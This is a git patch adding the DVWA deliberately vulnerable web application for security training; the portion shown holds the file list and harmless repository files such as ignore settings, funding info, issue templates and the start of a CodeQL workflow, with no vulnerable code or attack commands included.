From 922478504b82cb6a93e399c7e7857f1d824cefc3 Mon Sep 17 00:00:00 2001 From: Austen Stone Date: Wed, 9 Jul 2025 17:42:00 -0400 Subject: [PATCH] Add complete vulnerable-node application with DVWA integration --- DVWA/.dockerignore | 6 + DVWA/.gitattributes | 31 + DVWA/.github/FUNDING.yml | 4 + .../bug-report---installation.md | 47 + .../bug-report---vulnerability.md | 46 + DVWA/.github/ISSUE_TEMPLATE/i-m-stuck.md | 21 + DVWA/.github/workflows/codeql-analysis.yml | 71 + DVWA/.github/workflows/docker-image.yml | 36 + DVWA/.github/workflows/pytest.yml | 25 + DVWA/.github/workflows/shiftleft-analysis.yml | 42 + DVWA/.github/workflows/vulnerable.yml | 54 + DVWA/.gitignore | 16 + DVWA/CHANGELOG.md | 162 ++ DVWA/COPYING.txt | 623 +++++ DVWA/Dockerfile | 25 + DVWA/README.ar.md | 409 ++++ DVWA/README.es.md | 428 ++++ DVWA/README.fa.md | 390 ++++ DVWA/README.fr.md | 386 ++++ DVWA/README.id.md | 551 +++++ DVWA/README.it.md | 747 ++++++ DVWA/README.ko.md | 654 ++++++ DVWA/README.md | 748 +++++++ DVWA/README.pl.md | 612 +++++ DVWA/README.pt.md | 436 ++++ DVWA/README.tr.md | 410 ++++ DVWA/README.vi.md | 681 ++++++ DVWA/README.zh.md | 398 ++++ DVWA/SECURITY.md | 1 + DVWA/about.php | 56 + DVWA/compose.yml | 39 + DVWA/config/config.inc.php.dist | 56 + DVWA/database/create_mssql_db.sql | 15 + DVWA/database/create_oracle_db.sql | 27 + DVWA/database/create_postgresql_db.sql | 7 + DVWA/database/create_sqlite_db.sql | 27 + DVWA/database/sqli.db | Bin 0 -> 20480 bytes DVWA/database/sqli.db.dist | Bin 0 -> 20480 bytes DVWA/docs/DVWA_v1.3.pdf | Bin 0 -> 422011 bytes DVWA/docs/graphics/docker/detail.png | Bin 0 -> 164347 bytes DVWA/docs/graphics/docker/overview.png | Bin 0 -> 73209 bytes DVWA/docs/pdf.html | 1 + DVWA/dvwa/css/help.css | 45 + DVWA/dvwa/css/login.css | 59 + DVWA/dvwa/css/main.css | 335 +++ DVWA/dvwa/css/source.css | 47 + DVWA/dvwa/images/dollar.png | Bin 0 -> 299 bytes DVWA/dvwa/images/lock.png | Bin 0 -> 761 bytes DVWA/dvwa/images/login_logo.png | Bin 0 -> 9088 bytes DVWA/dvwa/images/logo.png | Bin 0 -> 5044 bytes DVWA/dvwa/images/spanner.png | Bin 0 -> 464 bytes DVWA/dvwa/images/theme-light-dark.png | Bin 0 -> 1029 bytes DVWA/dvwa/images/warning.png | Bin 0 -> 423 bytes DVWA/dvwa/includes/DBMS/MySQL.php | 104 + DVWA/dvwa/includes/DBMS/PGSQL.php | 105 + DVWA/dvwa/includes/Parsedown.php | 1994 +++++++++++++++++ DVWA/dvwa/includes/dvwaPage.inc.php | 691 ++++++ DVWA/dvwa/js/add_event_listeners.js | 24 + DVWA/dvwa/js/dvwaPage.js | 45 + DVWA/external/recaptcha/recaptchalib.php | 45 + DVWA/favicon.ico | Bin 0 -> 1406 bytes DVWA/hackable/flags/fi.php | 24 + DVWA/hackable/uploads/dvwa_email.png | Bin 0 -> 667 bytes DVWA/hackable/users/1337.jpg | Bin 0 -> 3681 bytes DVWA/hackable/users/admin.jpg | Bin 0 -> 3543 bytes DVWA/hackable/users/gordonb.jpg | Bin 0 -> 3063 bytes DVWA/hackable/users/pablo.jpg | Bin 0 -> 2961 bytes DVWA/hackable/users/smithy.jpg | Bin 0 -> 4382 bytes DVWA/index.php | 47 + DVWA/instructions.php | 67 + DVWA/login.php | 137 ++ DVWA/logout.php | 17 + DVWA/php.ini | 5 + DVWA/phpinfo.php | 10 + DVWA/robots.txt | 2 + DVWA/security.php | 82 + DVWA/security.txt | 1 + DVWA/setup.php | 156 ++ DVWA/tests/README.md | 14 + DVWA/tests/test_url.py | 90 + DVWA/vulnerabilities/api/.gitignore | 1 + DVWA/vulnerabilities/api/.htaccess | 10 + DVWA/vulnerabilities/api/README.md | 27 + DVWA/vulnerabilities/api/bootstrap.php | 2 + DVWA/vulnerabilities/api/composer.json | 10 + DVWA/vulnerabilities/api/composer.lock | 432 ++++ DVWA/vulnerabilities/api/gen_openapi.php | 12 + DVWA/vulnerabilities/api/help/help.php | 147 ++ DVWA/vulnerabilities/api/index.php | 71 + DVWA/vulnerabilities/api/openapi.yml | 435 ++++ DVWA/vulnerabilities/api/public/index.php | 100 + DVWA/vulnerabilities/api/source/high.php | 14 + .../vulnerabilities/api/source/impossible.php | 22 + DVWA/vulnerabilities/api/source/low.php | 118 + DVWA/vulnerabilities/api/source/medium.php | 95 + .../api/src/GenericController.php | 80 + .../api/src/HealthController.php | 200 ++ DVWA/vulnerabilities/api/src/Helpers.php | 15 + DVWA/vulnerabilities/api/src/Login.php | 48 + .../api/src/LoginController.php | 282 +++ DVWA/vulnerabilities/api/src/Order.php | 80 + .../api/src/OrderController.php | 337 +++ DVWA/vulnerabilities/api/src/Token.php | 62 + DVWA/vulnerabilities/api/src/User.php | 77 + .../api/src/UserController.php | 298 +++ DVWA/vulnerabilities/authbypass/authbypass.js | 53 + .../authbypass/change_user_details.php | 52 + .../authbypass/get_user_data.php | 42 + DVWA/vulnerabilities/authbypass/help/help.php | 82 + DVWA/vulnerabilities/authbypass/index.php | 77 + .../authbypass/source/high.php | 17 + .../authbypass/source/impossible.php | 13 + .../vulnerabilities/authbypass/source/low.php | 11 + .../authbypass/source/medium.php | 18 + DVWA/vulnerabilities/brute/help/help.php | 69 + DVWA/vulnerabilities/brute/index.php | 68 + DVWA/vulnerabilities/brute/source/high.php | 43 + .../brute/source/impossible.php | 102 + DVWA/vulnerabilities/brute/source/low.php | 32 + DVWA/vulnerabilities/brute/source/medium.php | 35 + DVWA/vulnerabilities/captcha/help/help.php | 62 + DVWA/vulnerabilities/captcha/index.php | 98 + DVWA/vulnerabilities/captcha/source/high.php | 55 + .../captcha/source/impossible.php | 67 + DVWA/vulnerabilities/captcha/source/low.php | 75 + .../vulnerabilities/captcha/source/medium.php | 83 + .../cryptography/help/help.php | 180 ++ DVWA/vulnerabilities/cryptography/index.php | 65 + .../cryptography/source/check_token_high.php | 25 + .../source/check_token_impossible.php | 25 + .../source/download_ecb_attack.php | 16 + .../source/download_oracle_attack.php | 16 + .../cryptography/source/ecb_attack.php | 98 + .../cryptography/source/high.php | 70 + .../cryptography/source/impossible.php | 70 + .../cryptography/source/low.php | 112 + .../cryptography/source/medium.php | 110 + .../cryptography/source/oracle_attack.php | 318 +++ .../source/token_library_high.php | 132 ++ .../source/token_library_impossible.php | 130 ++ .../cryptography/source/xor_theory.php | 36 + DVWA/vulnerabilities/csp/help/help.php | 58 + DVWA/vulnerabilities/csp/index.php | 57 + DVWA/vulnerabilities/csp/source/high.js | 19 + DVWA/vulnerabilities/csp/source/high.php | 22 + DVWA/vulnerabilities/csp/source/impossible.js | 19 + .../vulnerabilities/csp/source/impossible.php | 23 + DVWA/vulnerabilities/csp/source/jsonp.php | 13 + .../csp/source/jsonp_impossible.php | 7 + DVWA/vulnerabilities/csp/source/low.php | 37 + DVWA/vulnerabilities/csp/source/medium.php | 25 + DVWA/vulnerabilities/csrf/help/help.php | 71 + DVWA/vulnerabilities/csrf/index.php | 96 + DVWA/vulnerabilities/csrf/source/high.php | 69 + .../csrf/source/impossible.php | 50 + DVWA/vulnerabilities/csrf/source/low.php | 30 + DVWA/vulnerabilities/csrf/source/medium.php | 37 + .../vulnerabilities/csrf/test_credentials.php | 54 + DVWA/vulnerabilities/exec/help/help.php | 62 + DVWA/vulnerabilities/exec/index.php | 67 + DVWA/vulnerabilities/exec/source/high.php | 37 + .../exec/source/impossible.php | 41 + DVWA/vulnerabilities/exec/source/low.php | 21 + DVWA/vulnerabilities/exec/source/medium.php | 30 + DVWA/vulnerabilities/fi/file1.php | 22 + DVWA/vulnerabilities/fi/file2.php | 20 + DVWA/vulnerabilities/fi/file3.php | 31 + DVWA/vulnerabilities/fi/file4.php | 14 + DVWA/vulnerabilities/fi/help/help.php | 66 + DVWA/vulnerabilities/fi/include.php | 31 + DVWA/vulnerabilities/fi/index.php | 44 + DVWA/vulnerabilities/fi/source/high.php | 13 + DVWA/vulnerabilities/fi/source/impossible.php | 20 + DVWA/vulnerabilities/fi/source/low.php | 6 + DVWA/vulnerabilities/fi/source/medium.php | 10 + DVWA/vulnerabilities/help.css | 3 + DVWA/vulnerabilities/help.js | 11 + DVWA/vulnerabilities/javascript/help/help.php | 52 + DVWA/vulnerabilities/javascript/index.php | 123 + .../vulnerabilities/javascript/source/high.js | 1 + .../javascript/source/high.php | 3 + .../javascript/source/high_unobfuscated.js | 540 +++++ .../javascript/source/impossible.php | 0 .../vulnerabilities/javascript/source/low.php | 24 + .../javascript/source/medium.js | 1 + .../javascript/source/medium.php | 3 + .../open_redirect/help/help.php | 57 + DVWA/vulnerabilities/open_redirect/index.php | 60 + .../open_redirect/source/high.php | 21 + .../open_redirect/source/impossible.php | 29 + .../open_redirect/source/info.php | 61 + .../open_redirect/source/low.php | 13 + .../open_redirect/source/medium.php | 21 + DVWA/vulnerabilities/sqli/help/help.php | 60 + DVWA/vulnerabilities/sqli/index.php | 82 + DVWA/vulnerabilities/sqli/session-input.php | 32 + DVWA/vulnerabilities/sqli/source/high.php | 53 + .../sqli/source/impossible.php | 65 + DVWA/vulnerabilities/sqli/source/low.php | 56 + DVWA/vulnerabilities/sqli/source/medium.php | 59 + DVWA/vulnerabilities/sqli/test.php | 14 + .../sqli_blind/cookie-input.php | 31 + DVWA/vulnerabilities/sqli_blind/help/help.php | 62 + DVWA/vulnerabilities/sqli_blind/index.php | 97 + .../sqli_blind/source/high.php | 63 + .../sqli_blind/source/impossible.php | 65 + .../vulnerabilities/sqli_blind/source/low.php | 57 + .../sqli_blind/source/medium.php | 54 + DVWA/vulnerabilities/upload/help/help.php | 54 + DVWA/vulnerabilities/upload/index.php | 75 + DVWA/vulnerabilities/upload/source/high.php | 35 + .../upload/source/impossible.php | 62 + DVWA/vulnerabilities/upload/source/low.php | 19 + DVWA/vulnerabilities/upload/source/medium.php | 33 + DVWA/vulnerabilities/view_help.php | 40 + DVWA/vulnerabilities/view_source.php | 103 + DVWA/vulnerabilities/view_source_all.php | 122 + DVWA/vulnerabilities/weak_id/help/help.php | 40 + DVWA/vulnerabilities/weak_id/index.php | 61 + DVWA/vulnerabilities/weak_id/source/high.php | 14 + .../weak_id/source/impossible.php | 9 + DVWA/vulnerabilities/weak_id/source/low.php | 13 + .../vulnerabilities/weak_id/source/medium.php | 9 + DVWA/vulnerabilities/xss_d/help/help.php | 58 + DVWA/vulnerabilities/xss_d/index.php | 79 + DVWA/vulnerabilities/xss_d/source/high.php | 20 + .../xss_d/source/impossible.php | 5 + DVWA/vulnerabilities/xss_d/source/low.php | 5 + DVWA/vulnerabilities/xss_d/source/medium.php | 14 + DVWA/vulnerabilities/xss_r/help/help.php | 57 + DVWA/vulnerabilities/xss_r/index.php | 66 + DVWA/vulnerabilities/xss_r/source/high.php | 14 + .../xss_r/source/impossible.php | 18 + DVWA/vulnerabilities/xss_r/source/low.php | 11 + DVWA/vulnerabilities/xss_r/source/medium.php | 14 + DVWA/vulnerabilities/xss_s/help/help.php | 56 + DVWA/vulnerabilities/xss_s/index.php | 87 + DVWA/vulnerabilities/xss_s/source/high.php | 24 + .../xss_s/source/impossible.php | 31 + DVWA/vulnerabilities/xss_s/source/low.php | 22 + DVWA/vulnerabilities/xss_s/source/medium.php | 24 + 241 files changed, 22355 insertions(+) create mode 100644 DVWA/.dockerignore create mode 100644 DVWA/.gitattributes create mode 100644 DVWA/.github/FUNDING.yml create mode 100644 DVWA/.github/ISSUE_TEMPLATE/bug-report---installation.md create mode 100644 DVWA/.github/ISSUE_TEMPLATE/bug-report---vulnerability.md create mode 100644 DVWA/.github/ISSUE_TEMPLATE/i-m-stuck.md create mode 100644 DVWA/.github/workflows/codeql-analysis.yml create mode 100644 DVWA/.github/workflows/docker-image.yml create mode 100644 DVWA/.github/workflows/pytest.yml create mode 100644 DVWA/.github/workflows/shiftleft-analysis.yml create mode 100644 DVWA/.github/workflows/vulnerable.yml create mode 100644 DVWA/.gitignore create mode 100644 DVWA/CHANGELOG.md create mode 100644 DVWA/COPYING.txt create mode 100644 DVWA/Dockerfile create mode 100644 DVWA/README.ar.md create mode 100644 DVWA/README.es.md create mode 100644 DVWA/README.fa.md create mode 100644 DVWA/README.fr.md create mode 100644 DVWA/README.id.md create mode 100644 DVWA/README.it.md create mode 100644 DVWA/README.ko.md create mode 100644 DVWA/README.md create mode 100644 DVWA/README.pl.md create mode 100644 DVWA/README.pt.md create mode 100644 DVWA/README.tr.md create mode 100644 DVWA/README.vi.md create mode 100644 DVWA/README.zh.md create mode 100644 DVWA/SECURITY.md create mode 100644 DVWA/about.php create mode 100644 DVWA/compose.yml create mode 100644 DVWA/config/config.inc.php.dist create mode 100644 DVWA/database/create_mssql_db.sql create mode 100644 DVWA/database/create_oracle_db.sql create mode 100644 DVWA/database/create_postgresql_db.sql create mode 100644 DVWA/database/create_sqlite_db.sql create mode 100644 DVWA/database/sqli.db create mode 100644 DVWA/database/sqli.db.dist create mode 100644 DVWA/docs/DVWA_v1.3.pdf create mode 100644 DVWA/docs/graphics/docker/detail.png create mode 100644 DVWA/docs/graphics/docker/overview.png create mode 100644 DVWA/docs/pdf.html create mode 100644 DVWA/dvwa/css/help.css create mode 100644 DVWA/dvwa/css/login.css create mode 100644 DVWA/dvwa/css/main.css create mode 100644 DVWA/dvwa/css/source.css create mode 100644 DVWA/dvwa/images/dollar.png create mode 100644 DVWA/dvwa/images/lock.png create mode 100644 DVWA/dvwa/images/login_logo.png create mode 100644 DVWA/dvwa/images/logo.png create mode 100644 DVWA/dvwa/images/spanner.png create mode 100644 DVWA/dvwa/images/theme-light-dark.png create mode 100644 DVWA/dvwa/images/warning.png create mode 100644 DVWA/dvwa/includes/DBMS/MySQL.php create mode 100644 DVWA/dvwa/includes/DBMS/PGSQL.php create mode 100644 DVWA/dvwa/includes/Parsedown.php create mode 100644 DVWA/dvwa/includes/dvwaPage.inc.php create mode 100644 DVWA/dvwa/js/add_event_listeners.js create mode 100644 DVWA/dvwa/js/dvwaPage.js create mode 100644 DVWA/external/recaptcha/recaptchalib.php create mode 100644 DVWA/favicon.ico create mode 100644 DVWA/hackable/flags/fi.php create mode 100644 DVWA/hackable/uploads/dvwa_email.png create mode 100644 DVWA/hackable/users/1337.jpg create mode 100644 DVWA/hackable/users/admin.jpg create mode 100644 DVWA/hackable/users/gordonb.jpg create mode 100644 DVWA/hackable/users/pablo.jpg create mode 100644 DVWA/hackable/users/smithy.jpg create mode 100644 DVWA/index.php create mode 100644 DVWA/instructions.php create mode 100644 DVWA/login.php create mode 100644 DVWA/logout.php create mode 100644 DVWA/php.ini create mode 100644 DVWA/phpinfo.php create mode 100644 DVWA/robots.txt create mode 100644 DVWA/security.php create mode 100644 DVWA/security.txt create mode 100644 DVWA/setup.php create mode 100644 DVWA/tests/README.md create mode 100644 DVWA/tests/test_url.py create mode 100644 DVWA/vulnerabilities/api/.gitignore create mode 100644 DVWA/vulnerabilities/api/.htaccess create mode 100644 DVWA/vulnerabilities/api/README.md create mode 100644 DVWA/vulnerabilities/api/bootstrap.php create mode 100644 DVWA/vulnerabilities/api/composer.json create mode 100644 DVWA/vulnerabilities/api/composer.lock create mode 100644 DVWA/vulnerabilities/api/gen_openapi.php create mode 100644 DVWA/vulnerabilities/api/help/help.php create mode 100644 DVWA/vulnerabilities/api/index.php create mode 100644 DVWA/vulnerabilities/api/openapi.yml create mode 100644 DVWA/vulnerabilities/api/public/index.php create mode 100644 DVWA/vulnerabilities/api/source/high.php create mode 100644 DVWA/vulnerabilities/api/source/impossible.php create mode 100644 DVWA/vulnerabilities/api/source/low.php create mode 100644 DVWA/vulnerabilities/api/source/medium.php create mode 100644 DVWA/vulnerabilities/api/src/GenericController.php create mode 100644 DVWA/vulnerabilities/api/src/HealthController.php create mode 100644 DVWA/vulnerabilities/api/src/Helpers.php create mode 100644 DVWA/vulnerabilities/api/src/Login.php create mode 100644 DVWA/vulnerabilities/api/src/LoginController.php create mode 100644 DVWA/vulnerabilities/api/src/Order.php create mode 100644 DVWA/vulnerabilities/api/src/OrderController.php create mode 100644 DVWA/vulnerabilities/api/src/Token.php create mode 100644 DVWA/vulnerabilities/api/src/User.php create mode 100644 DVWA/vulnerabilities/api/src/UserController.php create mode 100644 DVWA/vulnerabilities/authbypass/authbypass.js create mode 100644 DVWA/vulnerabilities/authbypass/change_user_details.php create mode 100644 DVWA/vulnerabilities/authbypass/get_user_data.php create mode 100644 DVWA/vulnerabilities/authbypass/help/help.php create mode 100644 DVWA/vulnerabilities/authbypass/index.php create mode 100644 DVWA/vulnerabilities/authbypass/source/high.php create mode 100644 DVWA/vulnerabilities/authbypass/source/impossible.php create mode 100644 DVWA/vulnerabilities/authbypass/source/low.php create mode 100644 DVWA/vulnerabilities/authbypass/source/medium.php create mode 100644 DVWA/vulnerabilities/brute/help/help.php create mode 100644 DVWA/vulnerabilities/brute/index.php create mode 100644 DVWA/vulnerabilities/brute/source/high.php create mode 100644 DVWA/vulnerabilities/brute/source/impossible.php create mode 100644 DVWA/vulnerabilities/brute/source/low.php create mode 100644 DVWA/vulnerabilities/brute/source/medium.php create mode 100644 DVWA/vulnerabilities/captcha/help/help.php create mode 100644 DVWA/vulnerabilities/captcha/index.php create mode 100644 DVWA/vulnerabilities/captcha/source/high.php create mode 100644 DVWA/vulnerabilities/captcha/source/impossible.php create mode 100644 DVWA/vulnerabilities/captcha/source/low.php create mode 100644 DVWA/vulnerabilities/captcha/source/medium.php create mode 100644 DVWA/vulnerabilities/cryptography/help/help.php create mode 100644 DVWA/vulnerabilities/cryptography/index.php create mode 100644 DVWA/vulnerabilities/cryptography/source/check_token_high.php create mode 100644 DVWA/vulnerabilities/cryptography/source/check_token_impossible.php create mode 100644 DVWA/vulnerabilities/cryptography/source/download_ecb_attack.php create mode 100644 DVWA/vulnerabilities/cryptography/source/download_oracle_attack.php create mode 100644 DVWA/vulnerabilities/cryptography/source/ecb_attack.php create mode 100644 DVWA/vulnerabilities/cryptography/source/high.php create mode 100644 DVWA/vulnerabilities/cryptography/source/impossible.php create mode 100644 DVWA/vulnerabilities/cryptography/source/low.php create mode 100644 DVWA/vulnerabilities/cryptography/source/medium.php create mode 100644 DVWA/vulnerabilities/cryptography/source/oracle_attack.php create mode 100644 DVWA/vulnerabilities/cryptography/source/token_library_high.php create mode 100644 DVWA/vulnerabilities/cryptography/source/token_library_impossible.php create mode 100644 DVWA/vulnerabilities/cryptography/source/xor_theory.php create mode 100644 DVWA/vulnerabilities/csp/help/help.php create mode 100644 DVWA/vulnerabilities/csp/index.php create mode 100644 DVWA/vulnerabilities/csp/source/high.js create mode 100644 DVWA/vulnerabilities/csp/source/high.php create mode 100644 DVWA/vulnerabilities/csp/source/impossible.js create mode 100644 DVWA/vulnerabilities/csp/source/impossible.php create mode 100644 DVWA/vulnerabilities/csp/source/jsonp.php create mode 100644 DVWA/vulnerabilities/csp/source/jsonp_impossible.php create mode 100644 DVWA/vulnerabilities/csp/source/low.php create mode 100644 DVWA/vulnerabilities/csp/source/medium.php create mode 100644 DVWA/vulnerabilities/csrf/help/help.php create mode 100644 DVWA/vulnerabilities/csrf/index.php create mode 100644 DVWA/vulnerabilities/csrf/source/high.php create mode 100644 DVWA/vulnerabilities/csrf/source/impossible.php create mode 100644 DVWA/vulnerabilities/csrf/source/low.php create mode 100644 DVWA/vulnerabilities/csrf/source/medium.php create mode 100644 DVWA/vulnerabilities/csrf/test_credentials.php create mode 100644 DVWA/vulnerabilities/exec/help/help.php create mode 100644 DVWA/vulnerabilities/exec/index.php create mode 100644 DVWA/vulnerabilities/exec/source/high.php create mode 100644 DVWA/vulnerabilities/exec/source/impossible.php create mode 100644 DVWA/vulnerabilities/exec/source/low.php create mode 100644 DVWA/vulnerabilities/exec/source/medium.php create mode 100644 DVWA/vulnerabilities/fi/file1.php create mode 100644 DVWA/vulnerabilities/fi/file2.php create mode 100644 DVWA/vulnerabilities/fi/file3.php create mode 100644 DVWA/vulnerabilities/fi/file4.php create mode 100644 DVWA/vulnerabilities/fi/help/help.php create mode 100644 DVWA/vulnerabilities/fi/include.php create mode 100644 DVWA/vulnerabilities/fi/index.php create mode 100644 DVWA/vulnerabilities/fi/source/high.php create mode 100644 DVWA/vulnerabilities/fi/source/impossible.php create mode 100644 DVWA/vulnerabilities/fi/source/low.php create mode 100644 DVWA/vulnerabilities/fi/source/medium.php create mode 100644 DVWA/vulnerabilities/help.css create mode 100644 DVWA/vulnerabilities/help.js create mode 100644 DVWA/vulnerabilities/javascript/help/help.php create mode 100644 DVWA/vulnerabilities/javascript/index.php create mode 100644 DVWA/vulnerabilities/javascript/source/high.js create mode 100644 DVWA/vulnerabilities/javascript/source/high.php create mode 100644 DVWA/vulnerabilities/javascript/source/high_unobfuscated.js create mode 100644 DVWA/vulnerabilities/javascript/source/impossible.php create mode 100644 DVWA/vulnerabilities/javascript/source/low.php create mode 100644 DVWA/vulnerabilities/javascript/source/medium.js create mode 100644 DVWA/vulnerabilities/javascript/source/medium.php create mode 100644 DVWA/vulnerabilities/open_redirect/help/help.php create mode 100644 DVWA/vulnerabilities/open_redirect/index.php create mode 100644 DVWA/vulnerabilities/open_redirect/source/high.php create mode 100644 DVWA/vulnerabilities/open_redirect/source/impossible.php create mode 100644 DVWA/vulnerabilities/open_redirect/source/info.php create mode 100644 DVWA/vulnerabilities/open_redirect/source/low.php create mode 100644 DVWA/vulnerabilities/open_redirect/source/medium.php create mode 100644 DVWA/vulnerabilities/sqli/help/help.php create mode 100644 DVWA/vulnerabilities/sqli/index.php create mode 100644 DVWA/vulnerabilities/sqli/session-input.php create mode 100644 DVWA/vulnerabilities/sqli/source/high.php create mode 100644 DVWA/vulnerabilities/sqli/source/impossible.php create mode 100644 DVWA/vulnerabilities/sqli/source/low.php create mode 100644 DVWA/vulnerabilities/sqli/source/medium.php create mode 100644 DVWA/vulnerabilities/sqli/test.php create mode 100644 DVWA/vulnerabilities/sqli_blind/cookie-input.php create mode 100644 DVWA/vulnerabilities/sqli_blind/help/help.php create mode 100644 DVWA/vulnerabilities/sqli_blind/index.php create mode 100644 DVWA/vulnerabilities/sqli_blind/source/high.php create mode 100644 DVWA/vulnerabilities/sqli_blind/source/impossible.php create mode 100644 DVWA/vulnerabilities/sqli_blind/source/low.php create mode 100644 DVWA/vulnerabilities/sqli_blind/source/medium.php create mode 100644 DVWA/vulnerabilities/upload/help/help.php create mode 100644 DVWA/vulnerabilities/upload/index.php create mode 100644 DVWA/vulnerabilities/upload/source/high.php create mode 100644 DVWA/vulnerabilities/upload/source/impossible.php create mode 100644 DVWA/vulnerabilities/upload/source/low.php create mode 100644 DVWA/vulnerabilities/upload/source/medium.php create mode 100644 DVWA/vulnerabilities/view_help.php create mode 100644 DVWA/vulnerabilities/view_source.php create mode 100644 DVWA/vulnerabilities/view_source_all.php create mode 100644 DVWA/vulnerabilities/weak_id/help/help.php create mode 100644 DVWA/vulnerabilities/weak_id/index.php create mode 100644 DVWA/vulnerabilities/weak_id/source/high.php create mode 100644 DVWA/vulnerabilities/weak_id/source/impossible.php create mode 100644 DVWA/vulnerabilities/weak_id/source/low.php create mode 100644 DVWA/vulnerabilities/weak_id/source/medium.php create mode 100644 DVWA/vulnerabilities/xss_d/help/help.php create mode 100644 DVWA/vulnerabilities/xss_d/index.php create mode 100644 DVWA/vulnerabilities/xss_d/source/high.php create mode 100644 DVWA/vulnerabilities/xss_d/source/impossible.php create mode 100644 DVWA/vulnerabilities/xss_d/source/low.php create mode 100644 DVWA/vulnerabilities/xss_d/source/medium.php create mode 100644 DVWA/vulnerabilities/xss_r/help/help.php create mode 100644 DVWA/vulnerabilities/xss_r/index.php create mode 100644 DVWA/vulnerabilities/xss_r/source/high.php create mode 100644 DVWA/vulnerabilities/xss_r/source/impossible.php create mode 100644 DVWA/vulnerabilities/xss_r/source/low.php create mode 100644 DVWA/vulnerabilities/xss_r/source/medium.php create mode 100644 DVWA/vulnerabilities/xss_s/help/help.php create mode 100644 DVWA/vulnerabilities/xss_s/index.php create mode 100644 DVWA/vulnerabilities/xss_s/source/high.php create mode 100644 DVWA/vulnerabilities/xss_s/source/impossible.php create mode 100644 DVWA/vulnerabilities/xss_s/source/low.php create mode 100644 DVWA/vulnerabilities/xss_s/source/medium.php diff --git a/DVWA/.dockerignore b/DVWA/.dockerignore new file mode 100644 index 00000000..889c463b --- /dev/null +++ b/DVWA/.dockerignore @@ -0,0 +1,6 @@ +**/.git +**/.gitignore +**/.github +**/Dockerfile* +**/.dockerignore +**/compose.yml diff --git a/DVWA/.gitattributes b/DVWA/.gitattributes new file mode 100644 index 00000000..74dfb38f --- /dev/null +++ b/DVWA/.gitattributes @@ -0,0 +1,31 @@ +# Auto detect text files and perform LF normalization +* text=auto + +# +# The above will handle all files NOT found below +# + +# Documents +*.pdf diff=astextplain +*.PDF diff=astextplain +*.md text diff=markdown + +# Graphics +*.png binary +*.jpg binary +*.jpeg binary +*.ico binary + +# Archives +*.db binary + +# Text files where line endings should be preserved +*.patch -text + +# +# Exclude files from exporting +# + +.gitattributes export-ignore +.gitignore export-ignore +.gitkeep export-ignore diff --git a/DVWA/.github/FUNDING.yml b/DVWA/.github/FUNDING.yml new file mode 100644 index 00000000..a8ca1ee3 --- /dev/null +++ b/DVWA/.github/FUNDING.yml @@ -0,0 +1,4 @@ +# These are supported funding model platforms + +github: digininja +custom: https://digi.ninja diff --git a/DVWA/.github/ISSUE_TEMPLATE/bug-report---installation.md b/DVWA/.github/ISSUE_TEMPLATE/bug-report---installation.md new file mode 100644 index 00000000..47e936d7 --- /dev/null +++ b/DVWA/.github/ISSUE_TEMPLATE/bug-report---installation.md @@ -0,0 +1,47 @@ +--- +name: Bug report - Installation +about: Create a report about installation issues +title: '' +labels: '' +assignees: '' + +--- + +Before you raise a bug, please make sure you have fully read the README, especially if your bug relates to configuring the database. + +Issues will be closed if the answer is in the README and no obvious attempts have been made to follow it. + +Support will only be given for users running the latest pull of code from GitHub. Not a tagged release, not a pre-installed app, not a ZIP you got from a mate. + +**Describe the bug** +A clear and concise description of what the bug is. + +**To Reproduce** +What have you installed, what are you running when you get the error... + +Steps to reproduce the behaviour: +1. Go to '...' +2. Click on '....' +3. Scroll down to '....' +4. See error + +**Logs** +Include the last five lines of the Apache log file from directly after the problem happened. + +**Expected behaviour** +A clear and concise description of what you expected to happen. + +**What have you done to help fix the issue yourself?** +What have you tried, what research have you done, what changes have you made. + +**Screenshots** +If applicable, add screenshots to help explain your problem. + +**System (please complete the following information):** + - OS: [e.g. Windows, Ubuntu] + - Database and Version [e.g. MySQL, MariaDB, 10.5.12-MariaDB] + - PHP Version [e.g. 7.4.25] +- Installed PHP modules + +**Additional context** +Add any other context about the problem here. diff --git a/DVWA/.github/ISSUE_TEMPLATE/bug-report---vulnerability.md b/DVWA/.github/ISSUE_TEMPLATE/bug-report---vulnerability.md new file mode 100644 index 00000000..f1ef45a4 --- /dev/null +++ b/DVWA/.github/ISSUE_TEMPLATE/bug-report---vulnerability.md @@ -0,0 +1,46 @@ +--- +name: Bug report - Vulnerability +about: Creating a report in a bug in a vulnerability +title: '' +labels: '' +assignees: '' + +--- + +Before you raise a bug, please make sure you have fully read the README, especially if your bug relates to configuring the database. + +Issues will be closed if the answer is in the README and no obvious attempts have been made to follow it. + +Support will only be given for users running the latest pull of code from GitHub. Not a tagged release, not a pre-installed app, not a ZIP you got from a mate. + +**Describe the bug** +A clear and concise description of what the bug is. + +**To Reproduce** +Steps to reproduce the behaviour: +1. Go to '...' +2. Click on '....' +3. Scroll down to '....' +4. See error + +**Expected behaviour** +A clear and concise description of what you expected to happen. + +**What have you done to help fix the issue yourself?** +What have you tried, what research have you done, what changes have you made. + +**Screenshots** +If applicable, add screenshots to help explain your problem. + +**System (please complete the following information):** + - DVWA installation OS [e.g. Windows, Ubuntu] + - Database and Version [e.g. MySQL, MariaDB, 10.5.12-MariaDB] + - PHP Version [e.g. 7.4.25] + +**Browser/Proxy (please complete the following information):** + - OS - The one you are running the browser in: [e.g. Windows 10] + - Browser [e.g. Chrome, Firefox] + - Proxy [e.g. Burp, ZAP] + +**Additional context** +Add any other context about the problem here. diff --git a/DVWA/.github/ISSUE_TEMPLATE/i-m-stuck.md b/DVWA/.github/ISSUE_TEMPLATE/i-m-stuck.md new file mode 100644 index 00000000..9b60f585 --- /dev/null +++ b/DVWA/.github/ISSUE_TEMPLATE/i-m-stuck.md @@ -0,0 +1,21 @@ +--- +name: I'm Stuck +about: When you are stuck exploiting a vulnerability +title: '' +labels: 'stuck' +assignees: '' + +--- + +Questions here may or may not be answered depending on the state of the question, to increase your chance, read this before asking [Asking For Technical Help](https://digi.ninja/blog/asking_for_help.php). + +Basically, the more details you give, the more chance of getting an answer. We need at least: + +- Where did you get DVWA from? +- What OS are you installing it on? +- Last five lines from the web server access and error log from the time the error occurred if you got that far. +- The error you got when you got stuck. +- Any previous errors. +- What you have tried to do yourself to fix the problem. + +Support will only be given for users running the latest pull of code from GitHub. Not a tagged release, not a pre-installed app, not a ZIP you got from a mate. diff --git a/DVWA/.github/workflows/codeql-analysis.yml b/DVWA/.github/workflows/codeql-analysis.yml new file mode 100644 index 00000000..21178c9a --- /dev/null +++ b/DVWA/.github/workflows/codeql-analysis.yml @@ -0,0 +1,71 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +name: "CodeQL" + +on: + push: + 